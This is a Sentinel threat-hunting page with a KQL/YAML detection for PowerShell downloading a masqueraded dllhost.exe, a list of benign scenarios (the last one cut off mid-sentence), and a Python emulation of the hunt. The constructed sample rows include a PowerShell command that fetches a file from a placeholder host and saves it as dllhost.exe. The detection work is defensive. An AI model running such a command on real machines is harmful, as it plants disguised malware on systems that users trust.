Adversaries may use PowerShell to create a masqueraded DLLHost.exe file as part of a persistence or execution tactic. SOC teams should proactively hunt for this behavior in Azure Sentinel to detect potential malware or persistence mechanisms that evade traditional detection methods.
KQL Query

```kusto
DeviceProcessEvents
| where InitiatingProcessFileName =~ 'powershell.exe'
| where InitiatingProcessCommandLine has_all('$file=', 'dllhost.exe', 'Invoke-WebRequest', '-OutFile')
```
```yaml
id: 361aa11c-c7ad-4ef0-99fd-2ef52ddd2ba6
name: DLLHost.exe file creation via PowerShell
description: |
  Identify masqueraded DLLHost.exe file created by PowerShell.
requiredDataConnectors:
  - connectorId: MicrosoftThreatProtection
    dataTypes:
      - DeviceProcessEvents
tactics:
  - Execution
query: |
  DeviceProcessEvents
  | where InitiatingProcessFileName =~ 'powershell.exe'
  | where InitiatingProcessCommandLine has_all('$file=', 'dllhost.exe', 'Invoke-WebRequest', '-OutFile')
```
| Sentinel Table | Notes |
|---|---|
| DeviceProcessEvents | Ensure this data connector is enabled |
Scenario: Scheduled Task Running DLLHost.exe via PowerShell
Description: A legitimate scheduled task uses PowerShell to launch DLLHost.exe as part of a service or application deployment.
Filter/Exclusion: Exclude processes initiated by scheduled tasks with known legitimate task names (e.g., TaskScheduler or Microsoft\Windows\TaskScheduler). Use process.parent_process_name to filter out tasks managed by schtasks.exe.

Scenario: PowerShell Script for Application Initialization
Description: A system management script uses PowerShell to start DLLHost.exe as part of initializing a service or application.
Filter/Exclusion: Exclude processes launched by scripts located in known system directories (e.g., C:\Windows\System32\) or by trusted administrators using tools like PowerShell.exe with a known script path.

Scenario: Microsoft Intune or Configuration Manager Deployment
Description: A deployment tool like Microsoft Intune or SCCM uses PowerShell to deploy software that requires DLLHost.exe to run.
Filter/Exclusion: Exclude processes initiated by msiexec.exe, setup.exe, or ConfigurationManager.exe and filter based on the originating user or machine group.

Scenario: Admin Task to Monitor or Debug DLLHost.exe
Description: An administrator uses PowerShell to monitor or debug DLLHost.exe for troubleshooting purposes.
Filter/Exclusion: Exclude processes launched by users with administrative privileges and where the command line includes debugging tools like Procmon.exe or Process Explorer.

Scenario: PowerShell Module or Script for System Maintenance
Description: A PowerShell module or script used for system maintenance (e.g., patching, cleanup) triggers DLLHost.exe as part of its execution flow.
Filter/Exclusion: Exclude processes where the command line includes known maintenance scripts or
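To make the hunt's matching semantics and the exclusion scenarios concrete, here is an added Python emulation of the query above run over constructed DeviceProcessEvents rows. It is example code written for this page, not part of the original hunting query or of any Microsoft tooling. It assumes three columns of the DeviceProcessEvents schema (InitiatingProcessFileName, InitiatingProcessCommandLine and InitiatingProcessParentFileName, the last standing in for the parent-process filter the scenarios describe), approximates KQL `=~` as case-insensitive equality and `has_all` as case-insensitive containment, and uses a constructed parent-process allow-list for the deployment-tool scenario; the sample rows and the `example.invalid` URL are constructed, not real telemetry.

```python
# Added example (not from the original page): emulate the Sentinel hunt over
# constructed DeviceProcessEvents rows and apply a scenario-based exclusion.
from dataclasses import dataclass

# Terms the page's has_all clause requires in the initiating command line.
REQUIRED_TERMS = ("$file=", "dllhost.exe", "Invoke-WebRequest", "-OutFile")

# Constructed allow-list for the deployment-tool scenario (assumption; tune per
# environment). Compared case-insensitively against the parent process name.
BENIGN_PARENTS = {"msiexec.exe", "setup.exe", "configurationmanager.exe"}


@dataclass
class ProcessEvent:
    """Subset of DeviceProcessEvents columns the hunt needs."""
    InitiatingProcessFileName: str
    InitiatingProcessCommandLine: str
    InitiatingProcessParentFileName: str  # used only for the exclusion step


def has_all(text: str, terms) -> bool:
    """Approximate KQL has_all: every term present, case-insensitively.
    KQL 'has' is term-indexed; substring matching is close enough for this demo."""
    lowered = text.lower()
    return all(t.lower() in lowered for t in terms)


def matches_hunt(ev: ProcessEvent) -> bool:
    """The two 'where' clauses of the page's query (=~ is case-insensitive)."""
    return (ev.InitiatingProcessFileName.lower() == "powershell.exe"
            and has_all(ev.InitiatingProcessCommandLine, REQUIRED_TERMS))


def is_known_benign(ev: ProcessEvent) -> bool:
    """Exclusion for the Intune/SCCM scenario: trusted parent process."""
    return ev.InitiatingProcessParentFileName.lower() in BENIGN_PARENTS


def hunt(events):
    """Events that match the hunt and survive the exclusion."""
    return [ev for ev in events if matches_hunt(ev) and not is_known_benign(ev)]


# Constructed command line exhibiting the pattern the query looks for.
DOWNLOAD_CMD = (
    "powershell.exe -c \"$file='C:\\Users\\Public\\dllhost.exe'; "
    "Invoke-WebRequest -Uri https://example.invalid/x -OutFile $file\""
)

# Constructed sample rows (not real telemetry).
SAMPLE_EVENTS = [
    # 1: matches; parent cmd.exe is not allow-listed -> reported
    ProcessEvent("powershell.exe", DOWNLOAD_CMD, "cmd.exe"),
    # 2: same command line launched by ConfigurationManager.exe -> excluded
    ProcessEvent("powershell.exe", DOWNLOAD_CMD, "ConfigurationManager.exe"),
    # 3: ordinary download of a CSV, no dllhost.exe -> not a match
    ProcessEvent("powershell.exe",
                 "powershell.exe Invoke-WebRequest -Uri https://example.invalid/r.csv -OutFile r.csv",
                 "explorer.exe"),
    # 4: different casing; =~ and has_all are case-insensitive -> reported
    ProcessEvent("PowerShell.EXE", DOWNLOAD_CMD.upper(), "explorer.exe"),
    # 5: initiating process is cmd.exe, not PowerShell -> not a match
    ProcessEvent("cmd.exe", DOWNLOAD_CMD, "explorer.exe"),
]

if __name__ == "__main__":
    for ev in hunt(SAMPLE_EVENTS):
        print("HIT parent=%s cmd=%s" % (ev.InitiatingProcessParentFileName,
                                        ev.InitiatingProcessCommandLine[:60]))
```

Rows 1 and 4 are reported, row 2 is suppressed by the parent-process allow-list, and rows 3 and 5 never match the hunt. The allow-list is the simplest exclusion form; the remaining scenarios (known script paths, trusted users, maintenance scripts) would be added as further predicates in the same position in `hunt`, and each should be reviewed periodically since a broad exclusion is exactly what an adversary masquerading as DLLHost.exe would hide behind.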